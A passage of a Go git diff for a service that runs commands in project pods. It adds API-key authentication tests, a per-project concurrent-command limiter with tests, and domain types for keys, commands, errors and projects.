+ t.Run(tt.name, func(t *testing.T) { + if got := HasProjectAccess(tt.allowed, tt.project); got != tt.want { + t.Errorf("HasProjectAccess() = %v, want %v", got, tt.want) + } + }) + } +} diff --git a/internal/auth/service_test.go b/internal/auth/service_test.go new file mode 100644 index 0000000..fcfb643 --- /dev/null +++ b/internal/auth/service_test.go @@ -0,0 +1,394 @@ +package auth + +import ( + "context" + "fmt" + "testing" + "time" + + "github.com/orchard9/rdev/internal/testutil" +) + +func TestAPIKey_IsExpired(t *testing.T) { + now := time.Now() + past := now.Add(-1 * time.Hour) + future := now.Add(1 * time.Hour) + + tests := []struct { + name string + key *APIKey + want bool + }{ + {"nil expiration", &APIKey{ExpiresAt: nil}, false}, + {"expired", &APIKey{ExpiresAt: &past}, true}, + {"not expired", &APIKey{ExpiresAt: &future}, false}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + if got := tt.key.IsExpired(); got != tt.want { + t.Errorf("IsExpired() = %v, want %v", got, tt.want) + } + }) + } +} + +func TestAPIKey_IsRevoked(t *testing.T) { + now := time.Now() + + tests := []struct { + name string + key *APIKey + want bool + }{ + {"not revoked", &APIKey{RevokedAt: nil}, false}, + {"revoked", &APIKey{RevokedAt: &now}, true}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + if got := tt.key.IsRevoked(); got != tt.want { + t.Errorf("IsRevoked() = %v, want %v", got, tt.want) + } + }) + } +} + +func TestAPIKey_IsActive(t *testing.T) { + now := time.Now() + past := now.Add(-1 * time.Hour) + future := now.Add(1 * time.Hour) + + tests := []struct { + name string + key *APIKey + want bool + }{ + {"active", &APIKey{ExpiresAt: &future, RevokedAt: nil}, true}, + {"expired", &APIKey{ExpiresAt: &past, RevokedAt: nil}, false}, + {"revoked", &APIKey{ExpiresAt: &future, RevokedAt: &now}, false}, + {"never expires", &APIKey{ExpiresAt: nil, RevokedAt: nil}, true}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + if got := tt.key.IsActive(); got != tt.want { + t.Errorf("IsActive() = %v, want %v", got, tt.want) + } + }) + } +} + +func TestService_IsAdminKey(t *testing.T) { + svc := NewService(nil, "admin-secret") + + tests := []struct { + name string + key string + want bool + }{ + {"matches admin key", "admin-secret", true}, + {"wrong key", "wrong-key", false}, + {"empty key", "", false}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + if got := svc.IsAdminKey(tt.key); got != tt.want { + t.Errorf("IsAdminKey(%q) = %v, want %v", tt.key, got, tt.want) + } + }) + } +} + +func TestService_IsAdminKey_NoAdminKey(t *testing.T) { + svc := NewService(nil, "") + + if svc.IsAdminKey("anything") { + t.Error("IsAdminKey should return false when no admin key is set") + } +} + +// Integration tests - require database +func TestService_Create(t *testing.T) { + db := testutil.TestDB(t) + t.Cleanup(func() { testutil.CleanupTestKeys(t, db) }) + + svc := NewService(db, "admin-key") + + t.Run("creates key with valid scopes", func(t *testing.T) { + resp, err := svc.Create(context.Background(), CreateKeyRequest{ + Name: "test-key-1", + Scopes: []Scope{ScopeProjectsRead}, + ExpiresIn: 24 * time.Hour, + CreatedBy: "test", + }) + + if err != nil { + t.Fatalf("Create() error = %v", err) + } + + if resp.Secret == "" { + t.Error("Create() returned empty secret") + } + + if !ValidateKeyFormat(resp.Secret) { + t.Errorf("Create() returned invalid key format: %q", resp.Secret) + } + + if resp.Key.Name != "test-key-1" { + t.Errorf("Key.Name = %q, want %q", resp.Key.Name, "test-key-1") + } + + if len(resp.Key.Scopes) != 1 || resp.Key.Scopes[0] != ScopeProjectsRead { + t.Errorf("Key.Scopes = %v, want [%v]", resp.Key.Scopes, ScopeProjectsRead) + } + + if resp.Key.ExpiresAt == nil { + t.Error("Key.ExpiresAt should not be nil") + } + }) + + t.Run("rejects invalid scopes", func(t *testing.T) { + _, err := svc.Create(context.Background(), CreateKeyRequest{ + Name: "test-key-invalid", + Scopes: []Scope{Scope("invalid:scope")}, + CreatedBy: "test", + }) + + if err == nil { + t.Error("Create() should reject invalid scopes") + } + }) + + t.Run("creates key with no expiration", func(t *testing.T) { + resp, err := svc.Create(context.Background(), CreateKeyRequest{ + Name: "test-key-no-expire", + Scopes: []Scope{ScopeAdmin}, + ExpiresIn: 0, + CreatedBy: "test", + }) + + if err != nil { + t.Fatalf("Create() error = %v", err) + } + + if resp.Key.ExpiresAt != nil { + t.Error("Key.ExpiresAt should be nil for no expiration") + } + }) + + t.Run("creates key with project restrictions", func(t *testing.T) { + resp, err := svc.Create(context.Background(), CreateKeyRequest{ + Name: "test-key-projects", + Scopes: []Scope{ScopeProjectsRead}, + ProjectIDs: []string{"proj-a", "proj-b"}, + ExpiresIn: 24 * time.Hour, + CreatedBy: "test", + }) + + if err != nil { + t.Fatalf("Create() error = %v", err) + } + + if len(resp.Key.ProjectIDs) != 2 { + t.Errorf("Key.ProjectIDs length = %d, want 2", len(resp.Key.ProjectIDs)) + } + }) +} + +func TestService_Validate(t *testing.T) { + db := testutil.TestDB(t) + t.Cleanup(func() { testutil.CleanupTestKeys(t, db) }) + + svc := NewService(db, "admin-key-test") + + t.Run("validates admin key", func(t *testing.T) { + key, err := svc.Validate(context.Background(), "admin-key-test") + if err != nil { + t.Fatalf("Validate() error = %v", err) + } + + if key.ID != "admin" { + t.Errorf("Key.ID = %q, want %q", key.ID, "admin") + } + + if !HasScope(key.Scopes, ScopeAdmin) { + t.Error("Admin key should have admin scope") + } + }) + + t.Run("validates created key", func(t *testing.T) { + // Create a key first + resp, err := svc.Create(context.Background(), CreateKeyRequest{ + Name: "test-validate-key", + Scopes: []Scope{ScopeProjectsRead, ScopeKeysRead}, + ExpiresIn: 24 * time.Hour, + CreatedBy: "test", + }) + if err != nil { + t.Fatalf("Create() error = %v", err) + } + + // Validate it + key, err := svc.Validate(context.Background(), resp.Secret) + if err != nil { + t.Fatalf("Validate() error = %v", err) + } + + if key.Name != "test-validate-key" { + t.Errorf("Key.Name = %q, want %q", key.Name, "test-validate-key") + } + + if len(key.Scopes) != 2 { + t.Errorf("Key.Scopes length = %d, want 2", len(key.Scopes)) + } + }) + + t.Run("rejects invalid format", func(t *testing.T) { + _, err := svc.Validate(context.Background(), "not-a-valid-key") + if err != ErrKeyNotFound { + t.Errorf("Validate() error = %v, want %v", err, ErrKeyNotFound) + } + }) + + t.Run("rejects unknown key", func(t *testing.T) { + // Valid format but not in database + _, err := svc.Validate(context.Background(), "rdev_sk_abc12345_0123456789abcdef0123456789abcdef") + if err != ErrKeyNotFound { + t.Errorf("Validate() error = %v, want %v", err, ErrKeyNotFound) + } + }) +} + +func TestService_List(t *testing.T) { + db := testutil.TestDB(t) + t.Cleanup(func() { testutil.CleanupTestKeys(t, db) }) + + svc := NewService(db, "admin-key") + + // Create some test keys + for i := 0; i < 3; i++ { + _, err := svc.Create(context.Background(), CreateKeyRequest{ + Name: fmt.Sprintf("test-list-key-%d", i), + Scopes: []Scope{ScopeProjectsRead}, + ExpiresIn: 24 * time.Hour, + CreatedBy: "test", + }) + if err != nil { + t.Fatalf("Create() error = %v", err) + } + } + + keys, err := svc.List(context.Background()) + if err != nil { + t.Fatalf("List() error = %v", err) + } + + // Should have at least our 3 test keys + testKeyCount := 0 + for _, k := range keys { + if k.Name[:10] == "test-list-" { + testKeyCount++ + } + } + + if testKeyCount != 3 { + t.Errorf("List() returned %d test keys, want 3", testKeyCount) + } +} + +func TestService_Get(t *testing.T) { + db := testutil.TestDB(t) + t.Cleanup(func() { testutil.CleanupTestKeys(t, db) }) + + svc := NewService(db, "admin-key") + + t.Run("gets existing key", func(t *testing.T) { + resp, err := svc.Create(context.Background(), CreateKeyRequest{ + Name: "test-get-key", + Scopes: []Scope{ScopeProjectsRead}, + ExpiresIn: 24 * time.Hour, + CreatedBy: "test", + }) + if err != nil { + t.Fatalf("Create() error = %v", err) + } + + key, err := svc.Get(context.Background(), resp.Key.ID) + if err != nil { + t.Fatalf("Get() error = %v", err) + } + + if key.Name != "test-get-key" { + t.Errorf("Key.Name = %q, want %q", key.Name, "test-get-key") + } + }) + + t.Run("returns error for unknown key", func(t *testing.T) { + _, err := svc.Get(context.Background(), "00000000-0000-0000-0000-000000000000") + if err != ErrKeyNotFound { + t.Errorf("Get() error = %v, want %v", err, ErrKeyNotFound) + } + }) +} + +func TestService_Revoke(t *testing.T) { + db := testutil.TestDB(t) + t.Cleanup(func() { testutil.CleanupTestKeys(t, db) }) + + svc := NewService(db, "admin-key") + + t.Run("revokes existing key", func(t *testing.T) { + resp, err := svc.Create(context.Background(), CreateKeyRequest{ + Name: "test-revoke-key", + Scopes: []Scope{ScopeProjectsRead}, + ExpiresIn: 24 * time.Hour, + CreatedBy: "test", + }) + if err != nil { + t.Fatalf("Create() error = %v", err) + } + + err = svc.Revoke(context.Background(), resp.Key.ID) + if err != nil { + t.Fatalf("Revoke() error = %v", err) + } + + // Validate should fail + _, err = svc.Validate(context.Background(), resp.Secret) + if err != ErrKeyRevoked { + t.Errorf("Validate() after revoke error = %v, want %v", err, ErrKeyRevoked) + } + }) + + t.Run("returns error for unknown key", func(t *testing.T) { + err := svc.Revoke(context.Background(), "00000000-0000-0000-0000-000000000000") + if err != ErrKeyNotFound { + t.Errorf("Revoke() error = %v, want %v", err, ErrKeyNotFound) + } + }) + + t.Run("idempotent for already revoked", func(t *testing.T) { + resp, err := svc.Create(context.Background(), CreateKeyRequest{ + Name: "test-revoke-twice", + Scopes: []Scope{ScopeProjectsRead}, + ExpiresIn: 24 * time.Hour, + CreatedBy: "test", + }) + if err != nil { + t.Fatalf("Create() error = %v", err) + } + + // Revoke once + if err := svc.Revoke(context.Background(), resp.Key.ID); err != nil { + t.Fatalf("First Revoke() error = %v", err) + } + + // Revoke again - should return not found (no rows affected) + err = svc.Revoke(context.Background(), resp.Key.ID) + if err != ErrKeyNotFound { + t.Errorf("Second Revoke() error = %v, want %v", err, ErrKeyNotFound) + } + }) +} diff --git a/internal/cmdlimit/cmdlimit.go b/internal/cmdlimit/cmdlimit.go new file mode 100644 index 0000000..628d692 --- /dev/null +++ b/internal/cmdlimit/cmdlimit.go @@ -0,0 +1,197 @@ +// Package cmdlimit provides concurrent command limiting to prevent resource exhaustion. +package cmdlimit + +import ( + "context" + "errors" + "sync" + "time" +) + +// ErrLimitExceeded is returned when the concurrent command limit is reached. +var ErrLimitExceeded = errors.New("concurrent command limit exceeded") + +// Config defines the limiter configuration. +type Config struct { + // MaxConcurrentPerProject is the maximum concurrent commands per project. + // Defaults to 5. + MaxConcurrentPerProject int + + // MaxConcurrentTotal is the maximum concurrent commands across all projects. + // Defaults to 20. + MaxConcurrentTotal int + + // CommandTimeout is the maximum duration a command can hold a slot. + // After this duration, the slot is automatically released. + // Defaults to 30 minutes. + CommandTimeout time.Duration +} + +// DefaultConfig returns sensible defaults. +func DefaultConfig() Config { + return Config{ + MaxConcurrentPerProject: 5, + MaxConcurrentTotal: 20, + CommandTimeout: 30 * time.Minute, + } +} + +// Limiter tracks and enforces concurrent command limits. +type Limiter struct { + cfg Config + mu sync.Mutex + projectCounts map[string]int + totalCount int + activeCommands map[string]*activeCommand +} + +type activeCommand struct { + projectID string + startedAt time.Time + cancel context.CancelFunc +} + +// New creates a new concurrent command limiter. +func New(cfg Config) *Limiter { + if cfg.MaxConcurrentPerProject <= 0 { + cfg.MaxConcurrentPerProject = 5 + } + if cfg.MaxConcurrentTotal <= 0 { + cfg.MaxConcurrentTotal = 20 + } + if cfg.CommandTimeout <= 0 { + cfg.CommandTimeout = 30 * time.Minute + } + + return &Limiter{ + cfg: cfg, + projectCounts: make(map[string]int), + activeCommands: make(map[string]*activeCommand), + } +} + +// Acquire attempts to acquire a command slot for the given project. +// Returns a release function that MUST be called when the command completes. +// Returns ErrLimitExceeded if the limit is reached. +func (l *Limiter) Acquire(ctx context.Context, projectID, commandID string) (release func(), err error) { + l.mu.Lock() + defer l.mu.Unlock() + + // Check total limit + if l.totalCount >= l.cfg.MaxConcurrentTotal { + return nil, ErrLimitExceeded + } + + // Check per-project limit + if l.projectCounts[projectID] >= l.cfg.MaxConcurrentPerProject { + return nil, ErrLimitExceeded + } + + // Acquire the slot + l.totalCount++ + l.projectCounts[projectID]++ + + // Create a context with timeout for automatic release + cmdCtx, cancel := context.WithTimeout(ctx, l.cfg.CommandTimeout) + + l.activeCommands[commandID] = &activeCommand{ + projectID: projectID, + startedAt: time.Now(), + cancel: cancel, + } + + // Start a goroutine to auto-release on timeout + go func() { + <-cmdCtx.Done() + l.release(commandID) + }() + + // Return release function + return func() { + cancel() + l.release(commandID) + }, nil +} + +// release decrements the counters for a command. +func (l *Limiter) release(commandID string) { + l.mu.Lock() + defer l.mu.Unlock() + + cmd, exists := l.activeCommands[commandID] + if !exists { + return // Already released + } + + delete(l.activeCommands, commandID) + l.totalCount-- + l.projectCounts[cmd.projectID]-- + + if l.projectCounts[cmd.projectID] <= 0 { + delete(l.projectCounts, cmd.projectID) + } +} + +// Stats returns current usage statistics. +func (l *Limiter) Stats() Stats { + l.mu.Lock() + defer l.mu.Unlock() + + projectStats := make(map[string]int) + for k, v := range l.projectCounts { + projectStats[k] = v + } + + return Stats{ + TotalActive: l.totalCount, + MaxTotal: l.cfg.MaxConcurrentTotal, + ProjectCounts: projectStats, + MaxPerProject: l.cfg.MaxConcurrentPerProject, + ActiveCommandIDs: l.getActiveCommandIDs(), + } +} + +func (l *Limiter) getActiveCommandIDs() []string { + ids := make([]string, 0, len(l.activeCommands)) + for id := range l.activeCommands { + ids = append(ids, id) + } + return ids +} + +// Stats contains current limiter statistics. +type Stats struct { + TotalActive int + MaxTotal int + ProjectCounts map[string]int + MaxPerProject int + ActiveCommandIDs []string +} + +// IsProjectAtLimit checks if a project has reached its limit. +func (l *Limiter) IsProjectAtLimit(projectID string) bool { + l.mu.Lock() + defer l.mu.Unlock() + return l.projectCounts[projectID] >= l.cfg.MaxConcurrentPerProject +} + +// IsTotalAtLimit checks if the total limit has been reached. +func (l *Limiter) IsTotalAtLimit() bool { + l.mu.Lock() + defer l.mu.Unlock() + return l.totalCount >= l.cfg.MaxConcurrentTotal +} + +// ActiveCount returns the number of active commands for a project. +func (l *Limiter) ActiveCount(projectID string) int { + l.mu.Lock() + defer l.mu.Unlock() + return l.projectCounts[projectID] +} + +// TotalActiveCount returns the total number of active commands. +func (l *Limiter) TotalActiveCount() int { + l.mu.Lock() + defer l.mu.Unlock() + return l.totalCount +} diff --git a/internal/cmdlimit/cmdlimit_test.go b/internal/cmdlimit/cmdlimit_test.go new file mode 100644 index 0000000..71cd5d3 --- /dev/null +++ b/internal/cmdlimit/cmdlimit_test.go @@ -0,0 +1,414 @@ +package cmdlimit + +import ( + "context" + "sync" + "testing" + "time" +) + +func TestNew(t *testing.T) { + t.Run("default config", func(t *testing.T) { + l := New(Config{}) + + if l.cfg.MaxConcurrentPerProject != 5 { + t.Errorf("MaxConcurrentPerProject = %d, want 5", l.cfg.MaxConcurrentPerProject) + } + if l.cfg.MaxConcurrentTotal != 20 { + t.Errorf("MaxConcurrentTotal = %d, want 20", l.cfg.MaxConcurrentTotal) + } + if l.cfg.CommandTimeout != 30*time.Minute { + t.Errorf("CommandTimeout = %v, want 30m", l.cfg.CommandTimeout) + } + }) + + t.Run("custom config", func(t *testing.T) { + l := New(Config{ + MaxConcurrentPerProject: 10, + MaxConcurrentTotal: 50, + CommandTimeout: time.Hour, + }) + + if l.cfg.MaxConcurrentPerProject != 10 { + t.Errorf("MaxConcurrentPerProject = %d, want 10", l.cfg.MaxConcurrentPerProject) + } + if l.cfg.MaxConcurrentTotal != 50 { + t.Errorf("MaxConcurrentTotal = %d, want 50", l.cfg.MaxConcurrentTotal) + } + }) +} + +func TestDefaultConfig(t *testing.T) { + cfg := DefaultConfig() + + if cfg.MaxConcurrentPerProject != 5 { + t.Errorf("MaxConcurrentPerProject = %d, want 5", cfg.MaxConcurrentPerProject) + } + if cfg.MaxConcurrentTotal != 20 { + t.Errorf("MaxConcurrentTotal = %d, want 20", cfg.MaxConcurrentTotal) + } + if cfg.CommandTimeout != 30*time.Minute { + t.Errorf("CommandTimeout = %v, want 30m", cfg.CommandTimeout) + } +} + +func TestAcquire(t *testing.T) { + t.Run("allows commands within limit", func(t *testing.T) { + l := New(Config{ + MaxConcurrentPerProject: 3, + MaxConcurrentTotal: 10, + CommandTimeout: time.Minute, + }) + ctx := context.Background() + + // Should allow 3 commands for project-a + releases := make([]func(), 0) + for i := 0; i < 3; i++ { + release, err := l.Acquire(ctx, "project-a", "cmd-"+string(rune('a'+i))) + if err != nil { + t.Fatalf("Acquire %d failed: %v", i, err) + } + releases = append(releases, release) + } + + // Clean up + for _, r := range releases { + r() + } + }) + + t.Run("rejects when per-project limit reached", func(t *testing.T) { + l := New(Config{ + MaxConcurrentPerProject: 2, + MaxConcurrentTotal: 10, + CommandTimeout: time.Minute, + }) + ctx := context.Background() + + // Acquire 2 slots + release1, _ := l.Acquire(ctx, "project-a", "cmd-1") + defer release1() + release2, _ := l.Acquire(ctx, "project-a", "cmd-2") + defer release2() + + // Third should fail + _, err := l.Acquire(ctx, "project-a", "cmd-3") + if err != ErrLimitExceeded { + t.Errorf("Acquire() error = %v, want ErrLimitExceeded", err) + } + }) + + t.Run("allows other projects when one is at limit", func(t *testing.T) { + l := New(Config{ + MaxConcurrentPerProject: 1, + MaxConcurrentTotal: 10, + CommandTimeout: time.Minute, + }) + ctx := context.Background() + + // Fill project-a + releaseA, _ := l.Acquire(ctx, "project-a", "cmd-a") + defer releaseA() + + // project-b should still work + releaseB, err := l.Acquire(ctx, "project-b", "cmd-b") + if err != nil { + t.Errorf("Acquire(project-b) error = %v, want nil", err) + } + defer releaseB() + }) + + t.Run("rejects when total limit reached", func(t *testing.T) { + l := New(Config{ + MaxConcurrentPerProject: 5, + MaxConcurrentTotal: 3, + CommandTimeout: time.Minute, + }) + ctx := context.Background() + + // Fill total limit across different projects + release1, _ := l.Acquire(ctx, "project-a", "cmd-1") + defer release1() + release2, _ := l.Acquire(ctx, "project-b", "cmd-2") + defer release2() + release3, _ := l.Acquire(ctx, "project-c", "cmd-3") + defer release3() + + // Fourth should fail even for new project + _, err := l.Acquire(ctx, "project-d", "cmd-4") + if err != ErrLimitExceeded { + t.Errorf("Acquire() error = %v, want ErrLimitExceeded", err) + } + }) + + t.Run("release allows new commands", func(t *testing.T) { + l := New(Config{ + MaxConcurrentPerProject: 1, + MaxConcurrentTotal: 10, + CommandTimeout: time.Minute, + }) + ctx := context.Background() + + // Acquire and release + release1, _ := l.Acquire(ctx, "project-a", "cmd-1") + release1() + + // Should be able to acquire again + release2, err := l.Acquire(ctx, "project-a", "cmd-2") + if err != nil { + t.Errorf("Acquire() after release error = %v, want nil", err) + } + release2() + }) +} + +func TestStats(t *testing.T) { + l := New(Config{ + MaxConcurrentPerProject: 5, + MaxConcurrentTotal: 20, + CommandTimeout: time.Minute, + }) + ctx := context.Background() + + release1, _ := l.Acquire(ctx, "project-a", "cmd-1") + release2, _ := l.Acquire(ctx, "project-a", "cmd-2") + release3, _ := l.Acquire(ctx, "project-b", "cmd-3") + + stats := l.Stats() + + if stats.TotalActive != 3 { + t.Errorf("TotalActive = %d, want 3", stats.TotalActive) + } + if stats.MaxTotal != 20 { + t.Errorf("MaxTotal = %d, want 20", stats.MaxTotal) + } + if stats.ProjectCounts["project-a"] != 2 { + t.Errorf("ProjectCounts[project-a] = %d, want 2", stats.ProjectCounts["project-a"]) + } + if stats.ProjectCounts["project-b"] != 1 { + t.Errorf("ProjectCounts[project-b] = %d, want 1", stats.ProjectCounts["project-b"]) + } + if len(stats.ActiveCommandIDs) != 3 { + t.Errorf("ActiveCommandIDs length = %d, want 3", len(stats.ActiveCommandIDs)) + } + + release1() + release2() + release3() +} + +func TestIsProjectAtLimit(t *testing.T) { + l := New(Config{ + MaxConcurrentPerProject: 2, + MaxConcurrentTotal: 10, + CommandTimeout: time.Minute, + }) + ctx := context.Background() + + if l.IsProjectAtLimit("project-a") { + t.Error("IsProjectAtLimit should be false initially") + } + + release1, _ := l.Acquire(ctx, "project-a", "cmd-1") + release2, _ := l.Acquire(ctx, "project-a", "cmd-2") + + if !l.IsProjectAtLimit("project-a") { + t.Error("IsProjectAtLimit should be true after reaching limit") + } + + release1() + release2() +} + +func TestIsTotalAtLimit(t *testing.T) { + l := New(Config{ + MaxConcurrentPerProject: 5, + MaxConcurrentTotal: 2, + CommandTimeout: time.Minute, + }) + ctx := context.Background() + + if l.IsTotalAtLimit() { + t.Error("IsTotalAtLimit should be false initially") + } + + release1, _ := l.Acquire(ctx, "project-a", "cmd-1") + release2, _ := l.Acquire(ctx, "project-b", "cmd-2") + + if !l.IsTotalAtLimit() { + t.Error("IsTotalAtLimit should be true after reaching limit") + } + + release1() + release2() +} + +func TestActiveCount(t *testing.T) { + l := New(Config{ + MaxConcurrentPerProject: 5, + MaxConcurrentTotal: 10, + CommandTimeout: time.Minute, + }) + ctx := context.Background() + + if l.ActiveCount("project-a") != 0 { + t.Error("ActiveCount should be 0 initially") + } + + release1, _ := l.Acquire(ctx, "project-a", "cmd-1") + + if l.ActiveCount("project-a") != 1 { + t.Errorf("ActiveCount = %d, want 1", l.ActiveCount("project-a")) + } + + release1() + + if l.ActiveCount("project-a") != 0 { + t.Errorf("ActiveCount after release = %d, want 0", l.ActiveCount("project-a")) + } +} + +func TestTotalActiveCount(t *testing.T) { + l := New(Config{ + MaxConcurrentPerProject: 5, + MaxConcurrentTotal: 10, + CommandTimeout: time.Minute, + }) + ctx := context.Background() + + if l.TotalActiveCount() != 0 { + t.Error("TotalActiveCount should be 0 initially") + } + + release1, _ := l.Acquire(ctx, "project-a", "cmd-1") + release2, _ := l.Acquire(ctx, "project-b", "cmd-2") + + if l.TotalActiveCount() != 2 { + t.Errorf("TotalActiveCount = %d, want 2", l.TotalActiveCount()) + } + + release1() + release2() + + if l.TotalActiveCount() != 0 { + t.Errorf("TotalActiveCount after release = %d, want 0", l.TotalActiveCount()) + } +} + +func TestConcurrentAccess(t *testing.T) { + l := New(Config{ + MaxConcurrentPerProject: 10, + MaxConcurrentTotal: 100, + CommandTimeout: time.Minute, + }) + ctx := context.Background() + + var wg sync.WaitGroup + var successCount, failCount int64 + var mu sync.Mutex + + // Spawn many goroutines trying to acquire + for i := 0; i < 150; i++ { + wg.Add(1) + go func(idx int) { + defer wg.Done() + + release, err := l.Acquire(ctx, "project-a", "cmd-"+string(rune(idx))) + mu.Lock() + if err == nil { + successCount++ + mu.Unlock() + time.Sleep(10 * time.Millisecond) + release() + } else { + failCount++ + mu.Unlock() + } + }(i) + } + + wg.Wait() + + // Should have had some successes and some failures + if successCount == 0 { + t.Error("Expected some successful acquires") + } + if failCount == 0 { + t.Error("Expected some failed acquires (limit exceeded)") + } +} + +func TestAutoReleaseOnTimeout(t *testing.T) { + l := New(Config{ + MaxConcurrentPerProject: 1, + MaxConcurrentTotal: 10, + CommandTimeout: 100 * time.Millisecond, + }) + ctx := context.Background() + + // Acquire a slot + _, err := l.Acquire(ctx, "project-a", "cmd-1") + if err != nil { + t.Fatalf("Acquire failed: %v", err) + } + + // Should be at limit + if !l.IsProjectAtLimit("project-a") { + t.Error("Should be at limit after acquire") + } + + // Wait for timeout + time.Sleep(150 * time.Millisecond) + + // Should be auto-released + if l.IsProjectAtLimit("project-a") { + t.Error("Should not be at limit after auto-release") + } +} + +func TestDoubleRelease(t *testing.T) { + l := New(Config{ + MaxConcurrentPerProject: 5, + MaxConcurrentTotal: 10, + CommandTimeout: time.Minute, + }) + ctx := context.Background() + + release, _ := l.Acquire(ctx, "project-a", "cmd-1") + + // Release twice - should not panic or cause issues + release() + release() + + // Count should be 0, not negative + if l.ActiveCount("project-a") != 0 { + t.Errorf("ActiveCount after double release = %d, want 0", l.ActiveCount("project-a")) + } +} + +func TestContextCancellation(t *testing.T) { + l := New(Config{ + MaxConcurrentPerProject: 1, + MaxConcurrentTotal: 10, + CommandTimeout: time.Minute, + }) + + ctx, cancel := context.WithCancel(context.Background()) + + // Acquire a slot + _, err := l.Acquire(ctx, "project-a", "cmd-1") + if err != nil { + t.Fatalf("Acquire failed: %v", err) + } + + // Cancel the context + cancel() + + // Give goroutine time to process + time.Sleep(50 * time.Millisecond) + + // Should be auto-released due to context cancellation + if l.IsProjectAtLimit("project-a") { + t.Error("Should be released after context cancellation") + } +} diff --git a/internal/domain/apikey.go b/internal/domain/apikey.go new file mode 100644 index 0000000..e30aca6 --- /dev/null +++ b/internal/domain/apikey.go @@ -0,0 +1,83 @@ +package domain + +import "time" + +// APIKeyID is a strongly-typed identifier for API keys. +type APIKeyID string + +// Scope represents a permission scope for API keys. +type Scope string + +const ( + ScopeAdmin Scope = "admin" + ScopeProjectsRead Scope = "projects:read" + ScopeProjectsExecute Scope = "projects:execute" + ScopeKeysManage Scope = "keys:manage" +) + +// APIKey represents an API key for authentication. +type APIKey struct { + ID APIKeyID + Name string + KeyPrefix string // First 8 chars of key for identification + Scopes []Scope + ProjectIDs []ProjectID // nil = access to all projects + CreatedAt time.Time + ExpiresAt *time.Time + LastUsedAt *time.Time + RevokedAt *time.Time + CreatedBy string +} + +// IsExpired returns true if the key has expired. +func (k *APIKey) IsExpired() bool { + if k.ExpiresAt == nil { + return false + } + return time.Now().After(*k.ExpiresAt) +} + +// IsRevoked returns true if the key has been revoked. +func (k *APIKey) IsRevoked() bool { + return k.RevokedAt != nil +} + +// IsActive returns true if the key is valid for use. +func (k *APIKey) IsActive() bool { + return !k.IsRevoked() && !k.IsExpired() +} + +// HasScope returns true if the key has the specified scope. +func (k *APIKey) HasScope(scope Scope) bool { + // Admin scope grants all permissions + for _, s := range k.Scopes { + if s == ScopeAdmin || s == scope { + return true + } + } + return false +} + +// HasAnyScope returns true if the key has any of the specified scopes. +func (k *APIKey) HasAnyScope(scopes ...Scope) bool { + for _, scope := range scopes { + if k.HasScope(scope) { + return true + } + } + return false +} + +// HasProjectAccess returns true if the key can access the given project. +func (k *APIKey) HasProjectAccess(projectID ProjectID) bool { + // Admin or nil project list means access to all projects + if k.HasScope(ScopeAdmin) || k.ProjectIDs == nil { + return true + } + for _, pid := range k.ProjectIDs { + if pid == projectID { + return true + } + } + return false +} diff --git a/internal/domain/command.go b/internal/domain/command.go new file mode 100644 index 0000000..6e8198b --- /dev/null +++ b/internal/domain/command.go @@ -0,0 +1,47 @@ +package domain + +import "time" + +// CommandID is a strongly-typed identifier for commands. +type CommandID string + +// CommandType represents the type of command being executed. +type CommandType string + +const ( + CommandTypeClaude CommandType = "claude" + CommandTypeShell CommandType = "shell" + CommandTypeGit CommandType = "git" +) + +// Command represents a command to execute in a project's pod. +type Command struct { + ID CommandID + ProjectID ProjectID + Type CommandType + Args []string + StartedAt time.Time +} + +// CommandResult represents the outcome of command execution. +type CommandResult struct { + CommandID CommandID + ExitCode int + DurationMs int64 + Error error +} + +// Success returns true if the command completed successfully. +func (r *CommandResult) Success() bool { + return r.Error == nil && r.ExitCode == 0 +} + +// OutputLine represents a single line of command output. +type OutputLine struct { + Stream string // "stdout" or "stderr" + Line string + Timestamp time.Time +} + +// OutputHandler is called for each line of output from a command. +type OutputHandler func(line OutputLine) diff --git a/internal/domain/errors.go b/internal/domain/errors.go new file mode 100644 index 0000000..71f7980 --- /dev/null +++ b/internal/domain/errors.go @@ -0,0 +1,37 @@ +package domain + +import "errors" + +// Domain errors - these are business-level errors that should be translated +// to appropriate HTTP status codes or gRPC error codes by the presentation layer. +var ( + // Project errors + ErrProjectNotFound = errors.New("project not found") + ErrProjectNotRunning = errors.New("project is not running") + + // Command errors + ErrCommandNotFound = errors.New("command not found") + ErrCommandTimeout = errors.New("command timed out") + ErrCommandCancelled = errors.New("command was cancelled") + ErrLimitExceeded = errors.New("concurrent command limit exceeded") + ErrInvalidCommand = errors.New("invalid command") + ErrCommandSanitization = errors.New("command failed sanitization") + + // API Key errors + ErrKeyNotFound = errors.New("api key not found") + ErrKeyRevoked = errors.New("api key has been revoked") + ErrKeyExpired = errors.New("api key has expired") + ErrKeyInvalid = errors.New("invalid api key format") + + // Authorization errors + ErrUnauthorized = errors.New("unauthorized") + ErrForbidden = errors.New("forbidden") + ErrInsufficientScope = errors.New("insufficient scope") + + // Rate limiting errors + ErrRateLimited = errors.New("rate limit exceeded") + + // Infrastructure errors (should typically be wrapped) + ErrDatabaseConnection = errors.New("database connection error") + ErrKubernetesError = errors.New("kubernetes error") +) diff --git a/internal/domain/project.go b/internal/domain/project.go new file mode 100644 index 0000000..b4d23ba --- /dev/null +++ b/internal/domain/project.go @@ -0,0 +1,38 @@ +// Package domain contains pure domain models with no external dependencies. +// These types represent the core business concepts of the application. +package domain + +// ProjectID is a strongly-typed identifier for projects. +type ProjectID string + +// Project represents a claudebox project that can execute commands. +type Project struct { + ID ProjectID + Name string + Description string + PodName string + Status ProjectStatus + Workspace string +} + +// ProjectStatus represents the current state of a project's pod. +type ProjectStatus string + +const ( + ProjectStatusRunning ProjectStatus = "running" + ProjectStatusPending ProjectStatus = "pending" + ProjectStatusFailed ProjectStatus = "failed" + ProjectStatusNotFound ProjectStatus = "not_found" + ProjectStatusUnknown ProjectStatus = "unknown" + ProjectStatusError ProjectStatus = "error" +) + +// IsAvailable returns true if the project can accept commands. +func (s ProjectStatus) IsAvailable() bool { + return s == ProjectStatusRunning +} + +// IsTerminal returns true if the status is a final state. +func (s ProjectStatus) IsTerminal() bool { + return s == ProjectStatusFailed || s == ProjectStatusNotFound +} diff --git a/internal/executor/executor.go b/internal/executor/executor.go index 3cb64e9..9c4aa60 100644 --- a/internal/executor/executor.go +++ b/internal/executor/executor.go @@ -52,6 +52,17 @@ type Result struct { // OutputHandler is called for each line of output from the command. type OutputHandler 